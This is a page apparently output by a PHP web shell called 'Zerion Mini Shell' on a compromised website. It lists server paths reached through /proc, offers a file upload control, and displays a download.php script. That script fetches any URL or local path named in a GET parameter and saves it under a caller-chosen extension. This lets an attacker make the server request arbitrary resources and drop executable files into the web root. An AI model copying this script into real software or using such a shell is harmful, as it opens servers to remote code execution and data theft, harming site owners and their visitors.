ok

Mini Shell

Direktori : /proc/thread-self/root/proc/self/root/home2/selectio/public_html/ramali.in/dashboard/
Upload File :
Current File : //proc/thread-self/root/proc/self/root/home2/selectio/public_html/ramali.in/dashboard/download.php

<?php 
function download($location, $filename,$extension){
  $file = uniqid() . '.'.$extension;

  file_put_contents($file,file_get_contents($location));

  header('Content-Description: File Transfer');
  header('Content-Type: application/octet-stream');
  header('Content-Length: ' . filesize($file));
  header('Content-Disposition: attachment; filename=' . basename($filename));

  readfile($file);
}

download($_GET['location'], $_GET['filename'],$_GET['extension']);

Zerion Mini Shell 1.0